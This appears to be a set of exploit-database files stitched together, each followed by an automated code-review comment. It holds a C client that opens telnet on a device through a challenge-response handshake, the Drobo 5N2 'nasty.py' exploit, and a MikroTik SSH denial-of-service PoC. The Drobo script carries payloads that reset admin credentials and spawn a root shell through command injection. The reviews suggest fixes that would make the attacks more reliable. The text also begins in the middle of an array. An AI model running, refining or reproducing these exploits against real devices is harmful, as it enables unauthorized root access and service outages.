0x09, 0x05, 0x0f, 0x0a, 0x0b, 0x0e, 0x01, 0x07, 0x06, 0x00, 0x08, 0x0d,
0x04, 0x0b, 0x02, 0x0e, 0x0f, 0x00, 0x08, 0x0d, 0x03, 0x0c, 0x09, 0x07,
0x05, 0x0a, 0x06, 0x01, 0x0d, 0x00, 0x0b, 0x07, 0x04, 0x09, 0x01, 0x0a,
0x0e, 0x03, 0x05, 0x0c, 0x02, 0x0f, 0x08, 0x06, 0x01, 0x04, 0x0b, 0x0d,
0x0c, 0x03, 0x07, 0x0e, 0x0a, 0x0f, 0x06, 0x08, 0x00, 0x05, 0x09, 0x02,
0x06, 0x0b, 0x0d, 0x08, 0x01, 0x04, 0x0a, 0x07, 0x09, 0x05, 0x00, 0x0f,
0x0e, 0x02, 0x03, 0x0c, 0x0d, 0x02, 0x08, 0x04, 0x06, 0x0f, 0x0b, 0x01,
0x0a, 0x09, 0x03, 0x0e, 0x05, 0x00, 0x0c, 0x07, 0x01, 0x0f, 0x0d, 0x08,
0x0a, 0x03, 0x07, 0x04, 0x0c, 0x05, 0x06, 0x0b, 0x00, 0x0e, 0x09, 0x02,
0x07, 0x0b, 0x04, 0x01, 0x09, 0x0c, 0x0e, 0x02, 0x00, 0x06, 0x0a, 0x0d,
0x0f, 0x03, 0x05, 0x08, 0x02, 0x01, 0x0e, 0x07, 0x04, 0x0a, 0x08, 0x0d,
0x0f, 0x0c, 0x09, 0x00, 0x03, 0x05, 0x06, 0x0b, 0x10, 0x07, 0x14, 0x15,
0x1d, 0x0c, 0x1c, 0x11, 0x01, 0x0f, 0x17, 0x1a, 0x05, 0x12, 0x1f, 0x0a,
0x02, 0x08, 0x18, 0x0e, 0x20, 0x1b, 0x03, 0x09, 0x13, 0x0d, 0x1e, 0x06,
0x16, 0x0b, 0x04, 0x19, 0x3a, 0x32, 0x2a, 0x22, 0x1a, 0x12, 0x0a, 0x02,
0x3c, 0x34, 0x2c, 0x24, 0x1c, 0x14, 0x0c, 0x04, 0x3e, 0x36, 0x2e, 0x26,
0x1e, 0x16, 0x0e, 0x06, 0x40, 0x38, 0x30, 0x28, 0x20, 0x18, 0x10, 0x08,
0x39, 0x31, 0x29, 0x21, 0x19, 0x11, 0x09, 0x01, 0x3b, 0x33, 0x2b, 0x23,
0x1b, 0x13, 0x0b, 0x03, 0x3d, 0x35, 0x2d, 0x25, 0x1d, 0x15, 0x0d, 0x05,
0x3f, 0x37, 0x2f, 0x27, 0x1f, 0x17, 0x0f, 0x07, 0xf4, 0x63, 0x01, 0x00,
0x28, 0x08, 0x30, 0x10, 0x38, 0x18, 0x40, 0x20, 0x27, 0x07, 0x2f, 0x0f,
0x37, 0x17, 0x3f, 0x1f, 0x26, 0x06, 0x2e, 0x0e, 0x36, 0x16, 0x3e, 0x1e,
0x25, 0x05, 0x2d, 0x0d, 0x35, 0x15, 0x3d, 0x1d, 0x24, 0x04, 0x2c, 0x0c,
0x34, 0x14, 0x3c, 0x1c, 0x23, 0x03, 0x2b, 0x0b, 0x33, 0x13, 0x3b, 0x1b,
0x22, 0x02, 0x2a, 0x0a, 0x32, 0x12, 0x3a, 0x1a, 0x21, 0x01, 0x29, 0x09,
0x31, 0x11, 0x39, 0x19, 0x39, 0x31, 0x29, 0x21, 0x19, 0x11, 0x09, 0x01,
0x3a, 0x32, 0x2a, 0x22, 0x1a, 0x12, 0x0a, 0x02, 0x3b, 0x33, 0x2b, 0x23,
0x1b, 0x13, 0x0b, 0x03, 0x3c, 0x34, 0x2c, 0x24, 0x3f, 0x37, 0x2f, 0x27,
0x1f, 0x17, 0x0f, 0x07, 0x3e, 0x36, 0x2e, 0x26, 0x1e, 0x16, 0x0e, 0x06,
0x3d, 0x35, 0x2d, 0x25, 0x1d, 0x15, 0x0d, 0x05, 0x1c, 0x14, 0x0c, 0x04,
0x50, 0x64, 0x01, 0x00, 0x01, 0x01, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02,
0x01, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x01, 0x0e, 0x11, 0x0b, 0x18,
0x01, 0x05, 0x03, 0x1c, 0x0f, 0x06, 0x15, 0x0a, 0x17, 0x13, 0x0c, 0x04,
0x1a, 0x08, 0x10, 0x07, 0x1b, 0x14, 0x0d, 0x02, 0x29, 0x34, 0x1f, 0x25,
0x2f, 0x37, 0x1e, 0x28, 0x33, 0x2d, 0x21, 0x30, 0x2c, 0x31, 0x27, 0x38,
0x22, 0x35, 0x2e, 0x2a, 0x32, 0x24, 0x1d, 0x20
};
void init_cipher_offset_vector(byte *dst,byte *src,int size)
{
int i;
i = 0;
while (i < size) {
dst[i] = (byte)((int)(uint)src[i >> 3] >> (i & 7U)) & 1;
i = i + 1;
}
return;
}
void apply_cipher_offset_vector(byte *dst,byte *src,byte *offset_vector,size_t size)
{
int i;
i = 0;
while (i < (int)size) {
state[i] = src[(uint)offset_vector[i] - 1];
i = i + 1;
}
memcpy(dst,state,size);
return;
}
void cipher_memcpy_shuffle(void *dst,size_t size)
{
memcpy(state,dst,size);
memcpy(dst,(void *)(dst + size),0x1c - size);
memcpy((void *)(dst + (0x1c - size)),state,size);
return;
}
void init_cipher_state(void *dst,void *src)
{
byte current_byte;
int i;
init_cipher_offset_vector(state + 0x190,(byte *)src,0x40);
apply_cipher_offset_vector(state + 0x190,state + 0x190,datum + 0x2d4,0x38);
i = 0;
do {
current_byte = (datum + 0x310)[i];
i = i + 1;
cipher_memcpy_shuffle(state + 0x190,(uint)current_byte);
cipher_memcpy_shuffle(state + 0x190 + 0x1c,(uint)current_byte);
apply_cipher_offset_vector((byte *)dst,state + 0x190,datum + 0x320,0x30);
dst = (byte *)dst + 0x30;
} while (i != 0x10);
return;
}
void cipher_xor(byte *data,byte *key,int size)
{
int i;
i = 0;
while (i < size) {
data[i] = key[i] ^ data[i];
i = i + 1;
}
return;
}
void prepare_key(void *key,size_t key_size)
{
size_t __n;
memset(state + 0x1d0,0,0x10);
__n = key_size;
if (0xf < (int)key_size) {
__n = 0x10;
}
memcpy(state + 0x1d0,key,__n);
init_cipher_state(state + 0x1e0,state + 0x1d0);
if (8 < (int)key_size) {
init_cipher_state(state + 0x4e0,state + 0x1d8);
}
*(state + 0x7e0) = 8 < (int)key_size; // !!!! recheck size
return;
}
void cipher_shuffle(byte *dst,byte *src)
{
byte *caretPtr;
int iVar1;
byte *ptr;
int i;
apply_cipher_offset_vector(state + 0x100,dst,datum,0x30);
cipher_xor(state + 0x100,src,0x30);
ptr = state + 0x100;
i = 0;
do {
iVar1 = i + (uint)ptr[5] + (uint)*ptr * 2;
caretPtr = dst + i;
i = i + 4;
init_cipher_offset_vector
(caretPtr,datum + 0x30 +
(uint)ptr[2] * 4 + (uint)ptr[1] * 8 + (uint)ptr[4] + (uint)ptr[3] * 2 +
iVar1 * 0x10,4);
ptr = ptr + 6;
} while (i != 0x20);
apply_cipher_offset_vector(dst,dst,datum + 0x230,0x20);
return;
}
void cipher_box(byte *result,byte *data,byte *offset_vector,int direction)
{
uint i;
byte *backward_ov_ptr;
byte *forward_ov_ptr;
int iVar3;
init_cipher_offset_vector(state + 0x130,data,0x40);
apply_cipher_offset_vector(state + 0x130,state + 0x130,datum + 0x250,0x40);
if (direction == 0) {
forward_ov_ptr = offset_vector + 0x300;
do {
memcpy(state + 0x170,state + 0x150,0x20);
cipher_shuffle(state + 0x150,offset_vector);
cipher_xor(state + 0x150,state + 0x130,0x20);
memcpy(state + 0x130, state + 0x170, 0x20);
offset_vector = offset_vector + 0x30;
} while (offset_vector != forward_ov_ptr);
}
else {
backward_ov_ptr = offset_vector + 0x2d0;
do {
memcpy(state + 0x170,state + 0x130,0x20);
cipher_shuffle(state + 0x130,backward_ov_ptr);
cipher_xor(state + 0x130,state + 0x150,0x20);
backward_ov_ptr -= 0x30;
memcpy(state + 0x150,state + 0x170,0x20);
} while (backward_ov_ptr != offset_vector + -0x30);
}
apply_cipher_offset_vector(state + 0x130,state + 0x130,datum + 0x294,0x40);
memset(result,0,8);
i = 0;
do {
result[i >> 3] = result[i >> 3] | *(char *)(state + 0x130 + i) << (i & 7);
i = i + 1;
} while (i != 0x40);
return;
}
int decrypt(char *result,char *data,uint data_len,char *key,uint key_len)
{
uint short_key_iter;
int curBlockNumber;
int blockCount;
if (((result != (char *)0x0 && data != (char *)0x0) && (curBlockNumber = 0, key != (char *)0x0))
&& ((data_len + 7 & 0xfffffff8) != 0)) {
prepare_key(key,key_len);
blockCount = (int)(data_len + 7) >> 3;
short_key_iter = *(state + 0x7e0);
if (*(state + 0x7e0) == 0) {
while ((int)short_key_iter < blockCount) {
cipher_box((byte *)result,(byte *)data,state + 0x1e0,1);
short_key_iter = short_key_iter + 1;
result = (char *)((byte *)result + 8);
data = (char *)((byte *)data + 8);
}
}
else {
while (curBlockNumber < blockCount) {
cipher_box((byte *)result,(byte *)data,state + 0x1e0,1);
cipher_box((byte *)result,(byte *)result,state + 0x4e0,0);
cipher_box((byte *)result,(byte *)result,state + 0x1e0,1);
curBlockNumber = curBlockNumber + 1;
result = (char *)((byte *)result + 8);
data = (char *)((byte *)data + 8);
}
}
return 0;
}
return -1;
}
int encrypt(char *result,char *data,uint data_len,char *key,uint key_size)
{
uint uVar2;
int currentBlockNumber;
int blocksCount;
if (((result != (char *)0x0 && data != (char *)0x0) &&
(currentBlockNumber = 0, key != (char *)0x0)) && ((data_len + 7 & 0xfffffff8) != 0)) {
prepare_key(key,key_size);
blocksCount = (int)(data_len + 7) >> 3;
uVar2 = *(state + 0x7e0);
if (*(state + 0x7e0) == 0) {
while ((int)uVar2 < blocksCount) {
cipher_box((byte *)result,(byte *)data,state + 0x1e0,0);
uVar2 = uVar2 + 1;
result = (char *)((byte *)result + 8);
data = (char *)((byte *)data + 8);
}
}
else {
while (currentBlockNumber < blocksCount) {
cipher_box((byte *)result,(byte *)data,state + 0x1e0,0);
cipher_box((byte *)result,(byte *)result,state + 0x4e0,1);
cipher_box((byte *)result,(byte *)result,state + 0x1e0,0);
currentBlockNumber = currentBlockNumber + 1;
result = (char *)((byte *)result + 8);
data = (char *)((byte *)data + 8);
}
}
return 0;
}
return -1;
}
void tohex(unsigned char * in, size_t insz, char * out, size_t outsz)
{
unsigned char * pin = in;
const char * hex = "0123456789ABCDEF";
char * pout = out;
for(; pin < in+insz; pout +=3, pin++){
pout[0] = hex[(*pin>>4) & 0xF];
pout[1] = hex[ *pin & 0xF];
pout[2] = ':';
if (pout + 3 - out > outsz){
/* Better to truncate output string than overflow buffer */
/* it would be still better to either return a status */
/* or ensure the target buffer is large enough and it never happen */
break;
}
}
pout[-1] = 0;
}
char netbuf[4096];
#define PADDED(X) (((X + 7) / 8) * 8)
#define PORT 9530
#define BUFSIZE sizeof(netbuf)
#define CMD_FIRST "OpenTelnet:OpenOnce"
#define CHALLENGE_PROLOGUE "randNum:"
#define VERIFY_OK "verify:OK"
#define CMD_FINAL "CMD:"
#define FINAL_PAYLOAD "Telnet:OpenOnce"
#define OPEN_OK "Open:OK"
ssize_t send_str(int sockfd, char *str, size_t len) {
if (len > 0xFE) {
return -1;
}
char buf[len+1];
buf[0] = len + 1;
memcpy(buf + 1, str, len);
return send(sockfd, buf, len + 1, 0);
}
int main(int argc, char* argv[]) {
int sockfd, numbytes;
struct hostent *he;
struct sockaddr_in their_addr;
if (argc != 3) {
fprintf(stderr, "Usage: %s <host> <PSK>\n", argv[0]);
return 2;
}
if ((he=gethostbyname(argv[1])) == NULL) { /* get the host info */
herror("gethostbyname");
return 1;
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket");
return 1;
}
their_addr.sin_family = AF_INET; /* host byte order */
their_addr.sin_port = htons(PORT); /* short, network byte order */
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(their_addr.sin_zero), 8); /* zero the rest of the struct */
if (connect(sockfd, (struct sockaddr *)&their_addr, \
sizeof(struct sockaddr)) == -1) {
perror("connect");
return 1;
}
if (send_str(sockfd, CMD_FIRST, sizeof(CMD_FIRST)) == -1) {
perror("send");
return 1;
}
printf("Sent %s command.\n", CMD_FIRST);
bzero(netbuf, BUFSIZE);
if ((numbytes=recv(sockfd, netbuf, BUFSIZE - 1, 0)) == -1) {
perror("recv");
return 1;
}
puts(netbuf);
if (memcmp(netbuf, CHALLENGE_PROLOGUE, sizeof(CHALLENGE_PROLOGUE) - 1) != 0) {
fprintf(stderr, "No challenge received.\n");
return 3;
}
char *seed = netbuf + sizeof(CHALLENGE_PROLOGUE) - 1;
char challengeStr[strlen(seed) + strlen(argv[2]) + 1];
size_t challengeLen = sprintf(challengeStr, "%s%s", seed, argv[2]);
printf("challenge=%s\n", challengeStr);
char encryptedRandomSeed[PADDED(challengeLen)];
encrypt(encryptedRandomSeed, seed, strlen(seed), challengeStr, challengeLen);
memcpy(netbuf, CHALLENGE_PROLOGUE, sizeof(CHALLENGE_PROLOGUE) - 1);
memcpy(netbuf + sizeof(CHALLENGE_PROLOGUE) - 1, encryptedRandomSeed, PADDED(challengeLen));
if (send_str(sockfd, netbuf, sizeof(CHALLENGE_PROLOGUE) - 1 + PADDED(challengeLen)) == -1) {
perror("send");
return 1;
}
bzero(netbuf, BUFSIZE);
if ((numbytes=recv(sockfd, netbuf, BUFSIZE - 1, 0)) == -1) {
perror("recv");
return 1;
}
puts(netbuf);
if (memcmp(netbuf, VERIFY_OK, sizeof(VERIFY_OK) - 1) != 0) {
fprintf(stderr, "Verification failed.\n");
return 4;
}
char encryptedFinal[PADDED(sizeof(FINAL_PAYLOAD))];
encrypt(encryptedFinal, FINAL_PAYLOAD, sizeof(FINAL_PAYLOAD), challengeStr, challengeLen);
memcpy(netbuf, CMD_FINAL, sizeof(CMD_FINAL) - 1);
memcpy(netbuf + sizeof(CMD_FINAL) - 1, encryptedFinal, sizeof(encryptedFinal));
if (send_str(sockfd, netbuf, sizeof(CMD_FINAL) - 1 + sizeof(encryptedFinal)) == -1) {
perror("send");
return 1;
}
bzero(netbuf, BUFSIZE);
if ((numbytes=recv(sockfd, netbuf, BUFSIZE - 1, 0)) == -1) {
perror("recv");
return 1;
}
puts(netbuf);
if (memcmp(netbuf, OPEN_OK, sizeof(OPEN_OK) - 1)) {
fprintf(stderr, "Open failed.\n");
return 5;
}
return 0;
}
#
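Review bot: `numbytes` is assigned by each of the three `recv` calls (`if ((numbytes=recv(sockfd, netbuf, BUFSIZE - 1, 0)) == -1)`) but never read, so a zero return (peer closed the connection) cannot be told apart from a protocol mismatch and is reported as "No challenge received", "Verification failed" or "Open failed" against an all-zero buffer; either drop the variable or check for `numbytes == 0` and report the closed connection. Style: `gethostbyname` and `bzero` are legacy interfaces; `getaddrinfo` and `memset` are the portable replacements, and `sizeof(CMD_FIRST)` in the first `send_str` counts the trailing NUL while every later prefix uses `sizeof(...) - 1`, which should be documented as intentional if the length-prefixed frame really is meant to include it.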

exploits/hardware/remote/48214.py Executable file

@ -0,0 +1,247 @@
# Exploit Title: Drobo 5N2 4.1.1 - Remote Command Injection
# Date: 2020-03-12
# Exploit Author: Rick Ramgattie, Ian Sindermann
# Vendor Homepage: https://www.drobo.com/
# Version: 4.1.1 and lower.
# CVE: CVE-2018-14709, CVE-2018-14701
###
#!/usr/bin/env python3
# nasty.py - A proof-of-concept utility for (maliciously) interacting with the Drobo NASd service.
# This utility leverages the lack of any real authentication mechanism to perform arbitrary actions.
# These actions include:
# - Getting device status.
# - Installing applications.
# - Resetting admin credentials.
# - Popping root shells.
# - Turning on party mode.
# This set of exploits is known to affect the Drobo 5N2, firmware version 4.1.1 and lower.
# As of 2020-03-12, newer firmware versions appear to be vulnerable as well, but this has not been verified.
# Most of the Drobo product line also appears to be vulnerable. Again, this has not been verified.
# These vulnerabilities were disclosed to the manufacturer on 2018-07-10.
# More vulnerabilities for this device may be found here: https://blog.securityevaluators.com/4f1d885df7fc
###
# Product of ISE Labs.
# - http://www.securityevaluators.com/
# - @ISESecurity
###
# RE Notes:
# ,-- Encryption bool?
# Handshake Preamble: * /\
# 44 52 49 4e 45 54 54 4d 07 01 00 00 00 00 00 88
# \_____________________/ \_________/ \_________/
# Static string. To/from Size of
# "DIRNETTM" server? next message
#
# Handshake
# 64 72 61 31 37 33 32 30 32 33 30 30 30 31 30 00 00 00 00 00 64 72 61 31 37 33 32 30 32 33 30 30 30 31 30 00 00 00 00 00 00 00...
# \______________________________________________/ \_________/ \_______________________________________________/ \_________________-->
# Device serial number with NULL padding. NULL Device serial number with NULL padding. ESAID? 88 bytes of NULL
# "dra173202300010" "dra173202300010"
#
# The stat port returns an "ESAID" value that is identical to the serial number on this device (5N2).
# One of the serial numbers in this packet may actually be the ESAID.
#
# Preamble: *
# 44 52 49 4e 45 54 54 4d 0a 01 00 00 00 00 00 88
# \_____________________/ \_________/ \_________/
# Static string. To/from Size of
# "DIRNETTM" server? next message
#
# Message:
# XX XX XX XX XX XX XX XX 00
# \_____________________/ \/
# Arbitrary length string NULL terminator
#
#
# Protocol flow:
# Initial handshake: ,----- 2nd nibble in 3rd section is different. "07 01 00 00" instead of "0a 01 00 00" #TODO: why?
# | c -> s: Preamble. <-' \_
# | c -> s: Message: Handshake / `- These two are normally sent as one packet.
# v c <- s: Preamble. <-------- 2nd nibble in 3rd section is different. "87 01 00 00" instead of "8a 01 00 00" #TODO: why?
# Loop:
# +> c -> s: Preamble.
# | c -> s: Message: Command.
# | c <- s: Preamble.
# +- c <- s: Message: Results. > Large responses are split into chunks. Must use size from preamble.
import argparse
import logging
import re
import socket
import struct
import sys
LOG_FORMAT = '[%(levelname)s]: %(message)s'
BUFFER_SIZE = 1024
HANDSHAKE_PREAMBLE = b'\x44\x52\x49\x4e\x45\x54\x54\x4d\x07\x01\x00\x00'
PREAMBLE = b'\x44\x52\x49\x4e\x45\x54\x54\x4d\x0a\x01\x00\x00'
PREAMBLE_LEN = 16
# Note: Payloads usually contain the device's serial number. Replace this with
# '{serial}' so `send_msg` can insert the target's serial.
PAYLOADS = {
"daccess" :'<TMCmd><CmdID>78</CmdID><Params><Name>DroboAccess</Name><Action>Install</Action><Data>ftp://updates.drobo.com/droboapps/2.1/downloads/DroboAccess.tgz</Data></Params><ESAID>{serial}</ESAID></TMCmd>',
"dropbear":'<TMCmd><CmdID>78</CmdID><Params><Name>dropbear</Name><Action>Install</Action><Data>ftp://updates.drobo.com/droboapps/2.1/downloads/dropbear.tgz</Data></Params><ESAID>{serial}</ESAID></TMCmd>',
"getadmin":'<TMCmd><CmdID>30</CmdID><Params><DRINasAdminConfig>DRINasAdminConfig</DRINasAdminConfig><DRINasDroboAppsConfig>DRINasDroboAppsConfig</DRINasDroboAppsConfig></Params><ESAID>{serial}</ESAID></TMCmd>',
"getnet" :'<TMCmd><CmdID>30</CmdID><ESAID>{serial}</ESAID><Params><Network>Network</Network></Params></TMCmd>',
"gettemp" :'<TMCmd><CmdID>61</CmdID><ESAID>{serial}</ESAID></TMCmd>',
"partyon" :'<TMCmd><CmdID>26</CmdID><Params><IdentifyInterval>900</IdentifyInterval></Params><ESAID>{serial}</ESAID></TMCmd>',
"partyoff":'<TMCmd><CmdID>26</CmdID><Params><IdentifyInterval>0</IdentifyInterval></Params><ESAID>{serial}</ESAID></TMCmd>',
"popit" :'<TMCmd><CmdID>78</CmdID><Params><Name>Drobo`telnetd -l $SHELL -p 8383`Access</Name><Action>Install</Action><Data>bork</Data></Params><ESAID>{serial}</ESAID></TMCmd>',
"restart" :'<TMCmd><CmdID>21</CmdID><ESAID>{serial}</ESAID></TMCmd>',
"setadmin":'<TMCmd><CmdID>31</CmdID><Params><DRINASConfig><DRINasAdminConfig><UserName>admin</UserName><Password>ono</Password><ValidPassword>1</ValidPassword><EncryptedPassword>0</EncryptedPassword></DRINasAdminConfig><DRINasDroboAppsConfig><Version>11</Version><Enabled>1</Enabled></DRINasDroboAppsConfig></DRINASConfig></Params><ESAID>{serial}</ESAID></TMCmd>',
"test" :'<TMCmd><CmdID>82</CmdID><Params><Time>1521161215</Time><GMTOffset>4294966876</GMTOffset></Params><ESAID>{serial}</ESAID></TMCmd>',
"stdin" :'Handled elsewhere.'}
DEFAULT_PORT_STAT = 5000
DEFAULT_PORT_CMD = 5001
DEFAULT_TIMEOUT = None
HELP_EPILOG='''
PAYLOADS
daccess - Installs DroboAccess on the target device. At the time of writing,
DroboAccess has numerous unauthenticated command injection
vulnerabilities. Try the following:
GET /DroboAccess/delete_user?username=test';/usr/sbin/telnetd -l /bin/sh -p 8383
- A long delay and response of "<Error>0</Error>" is expected.
dropbear - Installs dropbear on the target device.
- A response of "<Error>0</Error>" is expected.
getadmin - Returns the target's current (redacted) admin configuration.
gettemp - Returns the target's system info (temperature and uptime).
getnet - Returns the target's network info.
partyon - Enables "party mode" on the target. This will cause the target
device's lights to blink for 15 minutes.
partyoff - Prematurely disables "party mode".
popit - Exploits CVE-2019-6801 to spawn a root bind shell on port 8383.
- A response of "<Error>1</Error>" is expected.
restart - Restarts the target device.
setadmin - Sets administrative options on the target.
- Username: admin
- Password: ono
- Apps enabled: yes
stdin - Reads data from STDIN and sends it as a command.
'''
def recv_message(s):
preamble = s.recv(PREAMBLE_LEN)
msg_len = struct.unpack(">I", preamble[-4:])[0] # Parse expected message length from preamble.
message = ''
if msg_len <= 0:
return(message)
while True:
message += s.recv(BUFFER_SIZE).decode('utf-8')
if len(message) >= msg_len:
return(message) # There will be a null at the end. It should be fine.
def send_handshake(s, serial):
serial_bytes = serial.encode('utf-8')
hs_body = struct.pack("16s", serial_bytes) # 16 byte padded string containing device serial number.
hs_body += struct.pack(">I", 0) # 4 byte field, presumably uint, only seen as zero.
hs_body += struct.pack("16s", serial_bytes) # 16 byte padded string containing device serial number. again...
hs_body += struct.pack("184x") # 184 bytes of NULL padding.
size_bytes = struct.pack(">I", len(hs_body)) # Size of message body. Send with preamble.
hs_data = HANDSHAKE_PREAMBLE + size_bytes + hs_body
logging.debug(repr(hs_data))
s.send(hs_data)
def send_message(s, serial, message):
msg_body = message.format(serial=serial) # Add target device's serial number.
msg_body_bytes = msg_body.encode('utf-8')
msg_body_bytes += struct.pack("x") # NULL terminator.
size_bytes = struct.pack(">I", len(msg_body_bytes)) # Size of XML body. Send with preamble.
msg_data = PREAMBLE + size_bytes + msg_body_bytes
logging.debug(repr(msg_data))
s.send(msg_data)
aparser = argparse.ArgumentParser(
description='nasty.py - A proof-of-concept utility for (maliciously) interacting with the Drobo NASd service.',
epilog=HELP_EPILOG,
formatter_class=argparse.RawDescriptionHelpFormatter)
aparser.add_argument("host", help='Host or IP address of the target Drobo.')
aparser.add_argument("payload", help='Payload to use. See PAYLOADS.')
aparser.add_argument("-p", "--portstat", help='Specify a non-default stat port on the Drobo.', default=DEFAULT_PORT_STAT, type=int)
aparser.add_argument("-P", "--portcmd", help='Specify a non-default command port on the Drobo.', default=DEFAULT_PORT_CMD, type=int)
aparser.add_argument("-s", "--serial", help='Manually set the target serial number. Skips serial number detection.')
aparser.add_argument("-t", "--timeout", help='Set a timeout in seconds for socket operations.', default=DEFAULT_TIMEOUT, type=float)
aparser.add_argument("-v", "--verbose", help='Increase verbosity.', action='store_true')
args = aparser.parse_args()
# Basic check for color support.
if sys.stdout.isatty() and sys.platform in ["linux","linux2","darwin"]:
logging.addLevelName(logging.NOTSET, "\033[39m????\033[0m")
logging.addLevelName(logging.DEBUG, "\033[37mDBUG\033[0m")
logging.addLevelName(logging.INFO, "\033[96mINFO\033[0m")
logging.addLevelName(logging.WARNING, "\033[93mWARN\033[0m")
logging.addLevelName(logging.ERROR, "\033[95mERRR\033[0m")
logging.addLevelName(logging.CRITICAL, "\033[91mCRIT\033[0m")
else:
logging.addLevelName(logging.NOTSET, "????")
logging.addLevelName(logging.DEBUG, "DBUG")
logging.addLevelName(logging.INFO, "INFO")
logging.addLevelName(logging.WARNING, "WARN")
logging.addLevelName(logging.ERROR, "ERRR")
logging.addLevelName(logging.CRITICAL, "CRIT")
if args.verbose:
logging.basicConfig(format=LOG_FORMAT, level=logging.DEBUG)
else:
logging.basicConfig(format=LOG_FORMAT, level=logging.INFO)
if args.payload == 'stdin':
logging.info("Reading payload from STDIN.")
payload_xml = sys.stdin.read()
logging.debug(payload_xml)
else:
payload_xml = PAYLOADS[args.payload]
logging.info("Connecting...")
# Connect to the stat port. This is required for the cmd port to work.
# The stat port also gives us the serial number.
sock_stat = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock_stat.settimeout(args.timeout)
sock_stat.connect((args.host, args.portstat))
# Connect to the cmd port.
sock_cmd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock_cmd.settimeout(args.timeout)
sock_cmd.connect((args.host, args.portcmd))
# Pull the serial number from the stat port.
logging.info("Pulling serial number...")
stat_msg = sock_stat.recv(BUFFER_SIZE)
if args.serial:
serial = args.serial
else:
m = re.search('<mSerial>([^<]+)</mSerial>', stat_msg.decode('utf-8'))
if not m:
logging.critical("Could not determine target's serial number!")
logging.debug(stat_msg)
sys.exit(100)
serial = m.group(1)
logging.info("Identified serial: " + serial)
# Perform a handshake with the cmd port. Requires the serial num.
logging.info('Performing handshake...')
send_handshake(sock_cmd, serial)
recv_message(sock_cmd) # Blank response - trash.
# Send the payload.
logging.info("Sending payload...")
send_message(sock_cmd, serial, payload_xml)
logging.info("Waiting for response...")
resp = recv_message(sock_cmd)
logging.info("Response:\n" + resp)
# Cleanup.
sock_cmd.close()
sock_stat.close()
logging.info("Donezo.")
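Review bot: the header lists `# CVE: CVE-2018-14709, CVE-2018-14701` but the `popit` entry in `HELP_EPILOG` says it "Exploits CVE-2019-6801"; the header should list every CVE the file covers so the index entry is complete. The `#!/usr/bin/env python3` shebang is placed after the seven-line header comment instead of on line 1, so the executable bit this file is committed with has no effect. In `recv_message`, each chunk is decoded separately (`message += s.recv(BUFFER_SIZE).decode('utf-8')`) and `len(message)` counts characters while `msg_len` from the preamble counts bytes: a multi-byte UTF-8 sequence split across two `recv` calls raises `UnicodeDecodeError`, and a reply containing any multi-byte character makes the loop wait for bytes that never arrive. Accumulate `bytes` and decode once after the length is reached; `s.send` should likewise be `s.sendall` since the handshake body is larger than a single write is guaranteed to deliver.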


@ -0,0 +1,103 @@
# Excploit Title: Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)
# Author: Hosein Askari
# Date: 2020-03-18
# Vendor Homepage: https://mikrotik.com/
# Model: hAP lite
# Processor architecture: smips
# Affected Version: through 6.44.3
# CVE: N/A
#Description:
An uncontrolled resource consumption vulnerability in SSH daemon on MikroTik routers through v6.44.3 could allow remote attackers to generate CPU activity, trigger refusal of new authorized connections with SIGPIPE signal(SIGPIPE is the "broken pipe" signal, which is sent to a process when it attempts to write to a pipe whose read end has closed or when it attempts to write to a socket that is no longer open for reading. The default action is to terminate the process) and cause a reboot via connect and write system calls because of uncontrolled resource management.
#details:
The issue reported in 02/25/2020 to the Mikrotik
First response by Mikrotik in 02/26/2020
The additional information about exploit and PoC video sent in 02/26/2020
The vulnerability is accepted by "Reinis-Jānis S" from mikrotik security team in 02/27/2020 and asked for providing the CVE number and disclosure date
#PoC:
#Mitigation:
It can be mitigated with firewall filter and service port restrictions.
Solution:
Hardening and tuning the daemon for these 2 parameters:
1- Number of allowed unauthenticated connections to ssh daemon
2- Maximum number of connections at which we start dropping everything for ssh daemon
PoC:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <signal.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define MAX_CON 32
#define MAX_THREADS 16
int Socket(char *ip, char *port) {
struct addrinfo hints, *ret, *p;
int sock, r;
ssize_t bytes;
char buffer[2048];
memset(&hints, 0, sizeof(hints));
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
if((r=getaddrinfo(ip, port, &hints, &ret))!=0) {
return EXIT_FAILURE;
}
for(p = ret; p != NULL; p = p->ai_next) {
if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
continue;
}
if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
close(sock);
continue;
}
break;
}
if(ret)
freeaddrinfo(ret);
fprintf(stderr, "ESTABLISHED %s:%s\n", ip, port);
return sock;
}
void signal_callback_handler(int signum){
printf("Caught signal SIGPIPE %d\n",signum);
}
void mal(char *ip, char *port, int id) {
int sockets[MAX_CON];
int i, g=1, r;
for(i=0; i!= MAX_CON; i++)
sockets[i]=0;
signal(SIGPIPE, signal_callback_handler);
while(1) {
for(i=0; i!= MAX_CON; i++) {
if(sockets[i] == 0)
sockets[i] = Socket(ip, port);
r=write(sockets[i], "\0", 1);
if(r == -1) {
close(sockets[i]);
sockets[i] = Socket(ip, port);
}
}
usleep(200000);
}
}
int main(int argc, char **argv) {
int i;
for(i=0; i!= MAX_THREADS; i++) {
if(fork())
mal(argv[1], argv[2], i);
usleep(200000);
}
getc(stdin);
return 0;
}
#########
Sincerely,
Hosein Askari
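Review bot: `Socket()` returns `EXIT_FAILURE` (the integer 1) when `getaddrinfo` fails and returns a stale, already-closed descriptor when every `connect` fails, yet `mal()` uses the return value directly as a file descriptor in `r=write(sockets[i], "\0", 1);`, so on the failure path the write goes to stdout or to a closed fd; return -1 on every failure and have the caller check for it. The process model is also worth documenting: `if(fork()) mal(argv[1], argv[2], i);` runs `mal()` in the parent, so the original process becomes the first worker and the `getc(stdin)` only executes in the last child, which cannot stop the others. Documentation: the `#PoC:` section at the top is empty and the `PoC:` label recurs before the code, the title carries "Excploit" and "Microtik", and `# CVE: N/A` sits beside a timeline stating that MikroTik asked for a CVE number; say whether one was assigned. The mitigation section names two daemon parameters but not the RouterOS settings that control them, 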